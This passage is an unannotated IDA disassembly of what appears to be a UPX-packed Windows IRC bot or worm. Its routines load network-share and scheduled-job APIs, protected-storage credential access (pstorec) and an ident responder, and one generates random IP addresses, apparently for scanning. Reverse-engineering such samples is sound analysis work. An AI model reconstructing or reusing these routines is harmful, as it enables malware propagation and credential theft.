mov eax, [ebp+var_20]
imul eax, 30h
push eax
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jnz short loc_40374C
push 8
call ds:dword_417234 ; WSASetLastError
push 8
pop eax
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_40374C: ; CODE XREF: sub_403588+1B2�j
mov eax, [ebp+var_20]
imul eax, 30h
push eax
push 0
push [ebp+var_1C]
call sub_416B6A ; memset
add esp, 0Ch
push 10h
push 0
lea eax, [ebp+var_10]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_10], 2
cmp [ebp+arg_4], 0
jz short loc_403790
push [ebp+arg_4]
call sub_416B9C ; atoi
pop ecx
push eax
call ds:dword_417238 ; ntohs
mov [ebp+var_E], ax
loc_403790: ; CODE XREF: sub_403588+1F2�j
and [ebp+var_18], 0
jmp short loc_40379D
; ---------------------------------------------------------------------------
loc_403796: ; CODE XREF: sub_403588:loc_4038A7�j
mov eax, [ebp+var_18]
inc eax
mov [ebp+var_18], eax
loc_40379D: ; CODE XREF: sub_403588+20C�j
mov eax, [ebp+var_18]
cmp eax, [ebp+var_20]
jnb loc_4038AC
cmp [ebp+arg_8], 0
jz short loc_4037B9
mov eax, [ebp+arg_8]
mov eax, [eax]
mov [ebp+var_40], eax
jmp short loc_4037C0
; ---------------------------------------------------------------------------
loc_4037B9: ; CODE XREF: sub_403588+225�j
mov [ebp+var_40], 4
loc_4037C0: ; CODE XREF: sub_403588+22F�j
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
mov edx, [ebp+var_40]
mov [ecx+eax], edx
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
mov dword ptr [ecx+eax+4], 2
cmp [ebp+arg_8], 0
jz short loc_4037F1
mov eax, [ebp+arg_8]
mov eax, [eax+8]
mov [ebp+var_44], eax
jmp short loc_4037F8
; ---------------------------------------------------------------------------
loc_4037F1: ; CODE XREF: sub_403588+25C�j
mov [ebp+var_44], 1
loc_4037F8: ; CODE XREF: sub_403588+267�j
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
mov edx, [ebp+var_44]
mov [ecx+eax+8], edx
cmp [ebp+arg_8], 0
jz short loc_403819
mov eax, [ebp+arg_8]
mov eax, [eax+0Ch]
mov [ebp+var_48], eax
jmp short loc_403820
; ---------------------------------------------------------------------------
loc_403819: ; CODE XREF: sub_403588+284�j
mov [ebp+var_48], 6
loc_403820: ; CODE XREF: sub_403588+28F�j
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
mov edx, [ebp+var_48]
mov [ecx+eax+0Ch], edx
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
mov dword ptr [ecx+eax+10h], 10h
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
lea eax, [ecx+eax+20h]
mov ecx, [ebp+var_18]
imul ecx, 30h
mov edx, [ebp+var_1C]
mov [edx+ecx+18h], eax
mov eax, [ebp+var_14]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_18]
mov eax, [eax+ecx*4]
mov eax, [eax]
mov [ebp+var_C], eax
push 10h
lea eax, [ebp+var_10]
push eax
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
lea eax, [ecx+eax+20h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
cmp [ebp+var_18], 0
jz short loc_4038A7
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
add ecx, eax
mov eax, [ebp+var_18]
dec eax
imul eax, 30h
mov edx, [ebp+var_1C]
mov [edx+eax+1Ch], ecx
loc_4038A7: ; CODE XREF: sub_403588+304�j
jmp loc_403796
; ---------------------------------------------------------------------------
loc_4038AC: ; CODE XREF: sub_403588+21B�j
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_1C]
mov [eax], ecx
xor eax, eax
locret_4038B6: ; CODE XREF: sub_403588+2E�j
; sub_403588+55�j ...
leave
retn 10h
sub_403588 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4038BA proc near ; DATA XREF: sub_403BD3+1BC�o
var_434 = dword ptr -434h
var_430 = byte ptr -430h
var_410 = dword ptr -410h
var_40C = dword ptr -40Ch
var_408 = dword ptr -408h
var_404 = byte ptr -404h
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 434h
cmp [ebp+arg_8], 0
jnz short loc_4038CF
cmp [ebp+arg_10], 0
jz short loc_4038D8
loc_4038CF: ; CODE XREF: sub_4038BA+D�j
mov eax, [ebp+arg_18]
and al, 0E0h
test eax, eax
jz short loc_4038ED
loc_4038D8: ; CODE XREF: sub_4038BA+13�j
push 2726h
call ds:dword_417234 ; WSASetLastError
mov eax, 2726h
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_4038ED: ; CODE XREF: sub_4038BA+1C�j
mov eax, [ebp+arg_0]
mov [ebp+var_40C], eax
mov eax, [ebp+var_40C]
movsx eax, word ptr [eax]
cmp eax, 2
jz short loc_403919
push 273Fh
call ds:dword_417234 ; WSASetLastError
mov eax, 273Fh
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_403919: ; CODE XREF: sub_4038BA+48�j
cmp [ebp+arg_8], 0
jz loc_403ABA
mov eax, [ebp+var_40C]
push dword ptr [eax+4]
call ds:dword_41721C ; inet_ntoa
mov [ebp+var_434], eax
cmp [ebp+var_434], 0
jnz short loc_403949
or eax, 0FFFFFFFFh
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_403949: ; CODE XREF: sub_4038BA+85�j
push 401h
push [ebp+var_434]
lea eax, [ebp+var_404]
push eax
call sub_407A56
add esp, 0Ch
mov eax, [ebp+arg_18]
and eax, 2
test eax, eax
jz short loc_403972
jmp loc_403BB4
; ---------------------------------------------------------------------------
loc_403972: ; CODE XREF: sub_4038BA+B1�j
mov eax, [ebp+arg_18]
and eax, 4
test eax, eax
jz short loc_4039F4
push 0
push 4
mov eax, [ebp+var_40C]
add eax, 4
push eax
call ds:dword_417220 ; gethostbyaddr
mov [ebp+var_410], eax
cmp [ebp+var_410], 0
jnz short loc_4039AA
call ds:dword_417224 ; WSAGetLastError
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_4039AA: ; CODE XREF: sub_4038BA+E3�j
mov eax, [ebp+var_410]
push dword ptr [eax]
call sub_416B40 ; strlen
pop ecx
inc eax
cmp eax, [ebp+arg_C]
jbe short loc_4039D3
push 2747h
call ds:dword_417234 ; WSASetLastError
mov eax, 2747h
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_4039D3: ; CODE XREF: sub_4038BA+102�j
push 401h
mov eax, [ebp+var_410]
push dword ptr [eax]
lea eax, [ebp+var_404]
push eax
call sub_407A56
add esp, 0Ch
jmp loc_403ABA
; ---------------------------------------------------------------------------
loc_4039F4: ; CODE XREF: sub_4038BA+C0�j
mov eax, [ebp+arg_18]
and eax, 1
test eax, eax
jz loc_403A92
mov eax, [ebp+var_40C]
cmp dword ptr [eax+4], 7F000001h
jz short loc_403A1D
mov eax, [ebp+var_40C]
cmp dword ptr [eax+4], 0
jnz short loc_403A92
loc_403A1D: ; CODE XREF: sub_4038BA+155�j
push 0
push 4
mov eax, [ebp+var_40C]
add eax, 4
push eax
call ds:dword_417220 ; gethostbyaddr
mov [ebp+var_410], eax
cmp [ebp+var_410], 0
jnz short loc_403A4B
call ds:dword_417224 ; WSAGetLastError
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_403A4B: ; CODE XREF: sub_4038BA+184�j
mov eax, [ebp+var_410]
push dword ptr [eax]
call sub_416B40 ; strlen
pop ecx
inc eax
cmp eax, [ebp+arg_C]
jbe short loc_403A74
push 2747h
call ds:dword_417234 ; WSASetLastError
mov eax, 2747h
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_403A74: ; CODE XREF: sub_4038BA+1A3�j
push 401h
mov eax, [ebp+var_410]
push dword ptr [eax]
lea eax, [ebp+var_404]
push eax
call sub_407A56
add esp, 0Ch
jmp short loc_403ABA
; ---------------------------------------------------------------------------
loc_403A92: ; CODE XREF: sub_4038BA+142�j
; sub_4038BA+161�j ...
lea eax, [ebp+var_404]
push eax
call sub_416B40 ; strlen
pop ecx
inc eax
cmp eax, [ebp+arg_C]
jbe short loc_403ABA
push 2747h
call ds:dword_417234 ; WSASetLastError
mov eax, 2747h
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_403ABA: ; CODE XREF: sub_4038BA+63�j
; sub_4038BA+135�j ...
cmp [ebp+arg_10], 0
jz loc_403B99
push 8
pop eax
test eax, eax
jz short loc_403B2C
push 0Ah
lea eax, [ebp+var_430]
push eax
mov eax, [ebp+var_40C]
mov ax, [eax+2]
push eax
call ds:dword_417238 ; ntohs
movzx eax, ax
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
lea eax, [ebp+var_430]
push eax
call sub_416B40 ; strlen
pop ecx
inc eax
cmp eax, [ebp+arg_14]
jbe short loc_403B19
push 2747h
call ds:dword_417234 ; WSASetLastError
mov eax, 2747h
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_403B19: ; CODE XREF: sub_4038BA+248�j
lea eax, [ebp+var_430]
push eax
push [ebp+arg_10]
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_403B99
; ---------------------------------------------------------------------------
loc_403B2C: ; CODE XREF: sub_4038BA+20F�j
mov eax, [ebp+arg_18]
and eax, 10h
neg eax
sbb eax, eax
and eax, offset aUdp ; "udp"
push eax
mov eax, [ebp+var_40C]
movzx eax, word ptr [eax+2]
push eax
call ds:dword_417228 ; getservbyport
mov [ebp+var_408], eax
cmp [ebp+var_408], 0
jnz short loc_403B61
or eax, 0FFFFFFFFh
jmp short locret_403BB9
; ---------------------------------------------------------------------------
loc_403B61: ; CODE XREF: sub_4038BA+2A0�j
mov eax, [ebp+var_408]
push dword ptr [eax]
call sub_416B40 ; strlen
pop ecx
inc eax
cmp eax, [ebp+arg_14]
jbe short loc_403B87
push 2747h
call ds:dword_417234 ; WSASetLastError
mov eax, 2747h
jmp short locret_403BB9
; ---------------------------------------------------------------------------
loc_403B87: ; CODE XREF: sub_4038BA+2B9�j
mov eax, [ebp+var_408]
push dword ptr [eax]
push [ebp+arg_10]
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_403B99: ; CODE XREF: sub_4038BA+204�j
; sub_4038BA+270�j
cmp [ebp+arg_8], 0
jz short loc_403BB0
lea eax, [ebp+var_404]
push eax
push [ebp+arg_8]
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_403BB0: ; CODE XREF: sub_4038BA+2E3�j
xor eax, eax
jmp short locret_403BB9
; ---------------------------------------------------------------------------
loc_403BB4: ; CODE XREF: sub_4038BA+B3�j
jmp loc_403A92
; ---------------------------------------------------------------------------
locret_403BB9: ; CODE XREF: sub_4038BA+2E�j
; sub_4038BA+5A�j ...
leave
retn 1Ch
sub_4038BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403BBD proc near ; DATA XREF: sub_403BD3+1C6�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp [ebp+arg_0], 0
jz short loc_403BCF
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
loc_403BCF: ; CODE XREF: sub_403BBD+7�j
pop ebp
retn 4
sub_403BBD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403BD3 proc near ; CODE XREF: UPX0:loc_4168BC�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
push offset aKernel32_dll ; "kernel32.dll"
call ds:dword_417054 ; LoadLibraryA
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_403C00
push offset aInitializecrit ; "InitializeCriticalSectionAndSpinCount"
push [ebp+var_C]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41DF10, eax
loc_403C00: ; CODE XREF: sub_403BD3+18�j
push offset aNetapi32_dll ; "netapi32.dll"
call ds:dword_417054 ; LoadLibraryA
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jz loc_403CC3
push offset aNetusegetinfo ; "NetUseGetInfo"
push [ebp+var_14]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41DF18, eax
push offset aNetuseadd ; "NetUseAdd"
push [ebp+var_14]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41DF1C, eax
push offset aNetusedel ; "NetUseDel"
push [ebp+var_14]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41DF20, eax
push offset aNetuserenum ; "NetUserEnum"
push [ebp+var_14]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41DF24, eax
push offset aNetshareenum ; "NetShareEnum"
push [ebp+var_14]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41DF28, eax
push offset aNetremotetod ; "NetRemoteTOD"
push [ebp+var_14]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41DF2C, eax
push offset aNetapibufferfr ; "NetApiBufferFree"
push [ebp+var_14]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41DF30, eax
push offset aNetschedulejob ; "NetScheduleJobAdd"
push [ebp+var_14]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41DF34, eax
push offset aNetaddalternat ; "NetAddAlternateComputerName"
push [ebp+var_14]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41DF38, eax
loc_403CC3: ; CODE XREF: sub_403BD3+3F�j
push offset aMpr_dll ; "mpr.dll"
call ds:dword_417054 ; LoadLibraryA
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_403D23
push offset aWnetaddconnect ; "WNetAddConnection2A"
push [ebp+var_8]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41DF3C, eax
push offset aWnetaddconne_0 ; "WNetAddConnection2W"
push [ebp+var_8]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41DF40, eax
push offset aWnetcancelconn ; "WNetCancelConnection2A"
push [ebp+var_8]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41DF44, eax
push offset aWnetcancelco_0 ; "WNetCancelConnection2W"
push [ebp+var_8]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41DF48, eax
loc_403D23: ; CODE XREF: sub_403BD3+102�j
push offset aWs2_32_dll ; "ws2_32.dll"
call ds:dword_417054 ; LoadLibraryA
mov [ebp+var_4], eax
push offset aGetaddrinfo ; "getaddrinfo"
push [ebp+var_4]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41DF54, eax
push offset aGetnameinfo ; "getnameinfo"
push [ebp+var_4]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41DF58, eax
push offset aFreeaddrinfo ; "freeaddrinfo"
push [ebp+var_4]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41DF5C, eax
cmp ds:dword_41DF54, 0
jz short loc_403D85
cmp ds:dword_41DF58, 0
jz short loc_403D85
cmp ds:dword_41DF5C, 0
jnz short loc_403DA3
loc_403D85: ; CODE XREF: sub_403BD3+19E�j
; sub_403BD3+1A7�j
mov ds:dword_41DF54, offset sub_403588
mov ds:dword_41DF58, offset sub_4038BA
mov ds:dword_41DF5C, offset sub_403BBD
loc_403DA3: ; CODE XREF: sub_403BD3+1B0�j
push offset aPstorec_dll ; "pstorec.dll"
call ds:dword_417054 ; LoadLibraryA
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_403DCA
push offset aPstorecreatein ; "PStoreCreateInstance"
push [ebp+var_10]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41DF50, eax
loc_403DCA: ; CODE XREF: sub_403BD3+1E2�j
push offset aWininet_dll ; "wininet.dll"
call ds:dword_417054 ; LoadLibraryA
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jz short locret_403DF1
push offset aInternetgetcon ; "InternetGetConnectedStateExA"
push [ebp+var_18]
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41DF4C, eax
locret_403DF1: ; CODE XREF: sub_403BD3+209�j
leave
retn
sub_403BD3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403DF3 proc near ; DATA XREF: sub_403FE5+89�o
var_1228 = dword ptr -1228h
var_1224 = byte ptr -1224h
var_1200 = byte ptr -1200h
var_11DC = byte ptr -11DCh
var_11B8 = dword ptr -11B8h
var_11B4 = dword ptr -11B4h
var_11B0 = dword ptr -11B0h
var_11AC = byte ptr -11ACh
var_11A6 = byte ptr -11A6h
var_1000 = byte ptr -1000h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1228h
call sub_416BC0
push 1ADh
push [ebp+arg_0]
lea eax, [ebp+var_11B0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push 1
lea eax, [ebp+var_11AC]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_11B4], eax
cmp [ebp+var_11B4], 0
jnz short loc_403E52
push [ebp+var_11B0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_403FE1
; ---------------------------------------------------------------------------
loc_403E52: ; CODE XREF: sub_403DF3+4A�j
lea eax, [ebp+var_11AC]
push eax
mov eax, [ebp+var_11B0]
push dword ptr [eax]
push offset dword_4189C4
lea eax, [ebp+var_11A6]
push eax
call sub_40D53F
add esp, 10h
loc_403E75: ; CODE XREF: sub_403DF3+BD�j
; sub_403DF3+10F�j ...
push 3E8h
push [ebp+var_11B4]
call sub_4048EF
pop ecx
pop ecx
mov [ebp+var_11B8], eax
mov eax, [ebp+var_11B0]
cmp dword ptr [eax+4], 0
jnz short loc_403EA2
cmp [ebp+var_11B8], 0
jnz short loc_403EA7
loc_403EA2: ; CODE XREF: sub_403DF3+A4�j
jmp loc_403FC7
; ---------------------------------------------------------------------------
loc_403EA7: ; CODE XREF: sub_403DF3+AD�j
cmp [ebp+var_11B8], 0FFFFFFFFh
jnz short loc_403EB2
jmp short loc_403E75
; ---------------------------------------------------------------------------
loc_403EB2: ; CODE XREF: sub_403DF3+BB�j
push 1000h
lea eax, [ebp+var_1000]
push eax
push [ebp+var_11B8]
call sub_4053DC
add esp, 0Ch
mov [ebp+var_1228], eax
cmp [ebp+var_1228], 0
jz short loc_403EF6
cmp [ebp+var_1228], 0FFFFFFFFh
jz short loc_403EF6
lea eax, [ebp+var_1000]
push eax
call sub_416B40 ; strlen
pop ecx
cmp eax, 10h
jbe short loc_403F07
loc_403EF6: ; CODE XREF: sub_403DF3+E6�j
; sub_403DF3+EF�j
push [ebp+var_11B8]
call sub_40538D
pop ecx
jmp loc_403E75
; ---------------------------------------------------------------------------
loc_403F07: ; CODE XREF: sub_403DF3+101�j
movsx eax, ds:byte_41EF98
test eax, eax
jz short loc_403F27
push offset byte_41EF98
lea eax, [ebp+var_1224]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_403F57
; ---------------------------------------------------------------------------
loc_403F27: ; CODE XREF: sub_403DF3+11D�j
lea eax, [ebp+var_1200]
push eax
lea eax, [ebp+var_1224]
push eax
lea eax, [ebp+var_11DC]
push eax
call sub_40668F
add esp, 0Ch
lea eax, [ebp+var_1224]
push eax
push offset byte_41EF98
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_403F57: ; CODE XREF: sub_403DF3+132�j
push offset aUseridUnix ; " : USERID : UNIX : "
lea eax, [ebp+var_1000]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
lea eax, [ebp+var_1224]
push eax
lea eax, [ebp+var_1000]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
push offset asc_418214 ; "\r\n"
lea eax, [ebp+var_1000]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
lea eax, [ebp+var_1000]
push eax
call sub_416B40 ; strlen
pop ecx
inc eax
push eax
lea eax, [ebp+var_1000]
push eax
push [ebp+var_11B8]
call sub_4053BF
add esp, 0Ch
push [ebp+var_11B8]
call sub_40538D
pop ecx
jmp loc_403E75
; ---------------------------------------------------------------------------
loc_403FC7: ; CODE XREF: sub_403DF3:loc_403EA2�j
push [ebp+var_11B4]
call sub_404CBB
pop ecx
push [ebp+var_11B0]
call sub_409763
pop ecx
xor eax, eax
locret_403FE1: ; CODE XREF: sub_403DF3+5A�j
leave
retn 4
sub_403DF3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403FE5 proc near ; CODE XREF: sub_40A9CF+EEC�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_4], 0
jz short loc_403FFD
push [ebp+arg_4]
call sub_40422A
pop ecx
test eax, eax
jnz short loc_404004
loc_403FFD: ; CODE XREF: sub_403FE5+9�j
mov [ebp+arg_4], offset dword_418A18
loc_404004: ; CODE XREF: sub_403FE5+16�j
push 1ADh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40401A
jmp short locret_40407B
; ---------------------------------------------------------------------------
loc_40401A: ; CODE XREF: sub_403FE5+31�j
push 6
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 0Ah
push eax
call sub_405F67
pop ecx
pop ecx
cmp [ebp+arg_0], 0
jz short loc_404059
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
test eax, eax
jz short loc_404059
and [ebp+var_8], 0
jmp short loc_404060
; ---------------------------------------------------------------------------
loc_404059: ; CODE XREF: sub_403FE5+5E�j
; sub_403FE5+6C�j
mov [ebp+var_8], 1
loc_404060: ; CODE XREF: sub_403FE5+72�j
push [ebp+arg_4]
push offset dword_4189F8
push [ebp+var_8]
push [ebp+var_4]
push offset sub_403DF3
call sub_4095A4
add esp, 14h
locret_40407B: ; CODE XREF: sub_403FE5+33�j
leave
retn
sub_403FE5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40407D proc near ; CODE XREF: sub_4055E5+772�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
loc_404085: ; CODE XREF: sub_40407D+2C�j
cmp [ebp+arg_4], 1
jbe short loc_4040AB
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax]
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_4]
dec eax
dec eax
mov [ebp+arg_4], eax
jmp short loc_404085
; ---------------------------------------------------------------------------
loc_4040AB: ; CODE XREF: sub_40407D+C�j
cmp [ebp+arg_4], 0
jz short loc_4040BF
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax]
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
loc_4040BF: ; CODE XREF: sub_40407D+32�j
mov eax, [ebp+var_4]
shr eax, 10h
mov ecx, [ebp+var_4]
and ecx, 0FFFFh
add eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shr eax, 10h
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
not eax
leave
retn
sub_40407D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4040E8 proc near ; CODE XREF: sub_4055E5+752�p
; sub_40A9CF+1A2F�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
cmp [ebp+var_4], 2
jz short loc_404146
cmp [ebp+var_4], 3
jz short loc_404124
cmp [ebp+var_4], 4
jz short loc_404106
jmp short loc_40416A
; ---------------------------------------------------------------------------
loc_404106: ; CODE XREF: sub_4040E8+1A�j
mov eax, [ebp+arg_0]
and al, 0
mov [ebp+arg_0], eax
push 0FEh
push 1
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
or ecx, eax
mov [ebp+arg_0], ecx
loc_404124: ; CODE XREF: sub_4040E8+14�j
mov eax, [ebp+arg_0]
and ah, 0
mov [ebp+arg_0], eax
push 0FEh
push 1
call sub_4103F5
pop ecx
pop ecx
shl eax, 8
mov ecx, [ebp+arg_0]
or ecx, eax
mov [ebp+arg_0], ecx
loc_404146: ; CODE XREF: sub_4040E8+E�j
mov eax, [ebp+arg_0]
and eax, 0FF00FFFFh
mov [ebp+arg_0], eax
push 0FEh
push 1
call sub_4103F5
pop ecx
pop ecx
shl eax, 10h
mov ecx, [ebp+arg_0]
or ecx, eax
mov [ebp+arg_0], ecx
loc_40416A: ; CODE XREF: sub_4040E8+1C�j
mov eax, [ebp+arg_0]
and eax, 0FFFFFFh
mov [ebp+arg_0], eax
push 0FEh
push 1
call sub_4103F5
pop ecx
pop ecx
shl eax, 18h
mov ecx, [ebp+arg_0]
or ecx, eax
mov [ebp+arg_0], ecx
mov eax, [ebp+arg_0]
leave
retn
sub_4040E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404193 proc near ; CODE XREF: sub_404279+A�p
; sub_40435B+17�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0Ah
push [ebp+arg_0]
push 0FFFFh
push 401h
call sub_4103F5
pop ecx
pop ecx
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
pop ebp
retn
sub_404193 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4041B7 proc near ; CODE XREF: sub_40D871+5B3�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 4
push offset dword_418A48
push [ebp+arg_0]
call sub_416BF0 ; strncmp
add esp, 0Ch
test eax, eax
jnz short loc_4041D5
push 1
pop eax
jmp short loc_404228
; ---------------------------------------------------------------------------
loc_4041D5: ; CODE XREF: sub_4041B7+17�j
push 4
push offset dword_418A40
push [ebp+arg_0]
call sub_416BF0 ; strncmp
add esp, 0Ch
test eax, eax
jnz short loc_4041F0
push 1
pop eax
jmp short loc_404228
; ---------------------------------------------------------------------------
loc_4041F0: ; CODE XREF: sub_4041B7+32�j
push 8
push offset dword_418A34
push [ebp+arg_0]
call sub_416BF0 ; strncmp
add esp, 0Ch
test eax, eax
jnz short loc_40420B
push 1
pop eax
jmp short loc_404228
; ---------------------------------------------------------------------------
loc_40420B: ; CODE XREF: sub_4041B7+4D�j
push 3
push offset dword_418A30
push [ebp+arg_0]
call sub_416BF0 ; strncmp
add esp, 0Ch
test eax, eax
jnz short loc_404226
push 1
pop eax
jmp short loc_404228
; ---------------------------------------------------------------------------
loc_404226: ; CODE XREF: sub_4041B7+68�j
xor eax, eax
loc_404228: ; CODE XREF: sub_4041B7+1C�j
; sub_4041B7+37�j ...
pop ebp
retn
sub_4041B7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40422A proc near ; CODE XREF: sub_402A32+206�p
; sub_403FE5+E�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
jmp short loc_40423C
; ---------------------------------------------------------------------------
loc_404235: ; CODE XREF: sub_40422A:loc_404273�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40423C: ; CODE XREF: sub_40422A+9�j
cmp [ebp+var_4], 6
jnz short loc_404244
jmp short loc_404275
; ---------------------------------------------------------------------------
loc_404244: ; CODE XREF: sub_40422A+16�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_404273
push [ebp+arg_0]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_40426C
cmp [ebp+var_8], 0FFFFh
jbe short loc_40426E
loc_40426C: ; CODE XREF: sub_40422A+37�j
jmp short loc_404275
; ---------------------------------------------------------------------------
loc_40426E: ; CODE XREF: sub_40422A+40�j
push 1
pop eax
jmp short locret_404277
; ---------------------------------------------------------------------------
loc_404273: ; CODE XREF: sub_40422A+25�j
jmp short loc_404235
; ---------------------------------------------------------------------------
loc_404275: ; CODE XREF: sub_40422A+18�j
; sub_40422A:loc_40426C�j
xor eax, eax
locret_404277: ; CODE XREF: sub_40422A+47�j
leave
retn
sub_40422A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404279 proc near ; CODE XREF: sub_4042FB+C�p
; sub_408B30+197�p ...
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
push ebp
mov ebp, esp
sub esp, 18h
lea eax, [ebp+var_8]
push eax
call sub_404193
pop ecx
push 1
lea eax, [ebp+var_8]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_4042A4
push 1
pop eax
jmp short locret_4042F9
; ---------------------------------------------------------------------------
loc_4042A4: ; CODE XREF: sub_404279+24�j
push 0BB8h
push 0
lea eax, [ebp+var_8]
push eax
push offset dword_41F018
call sub_4050EA
add esp, 10h
mov [ebp+var_C], eax
push [ebp+var_10]
call sub_404CBB
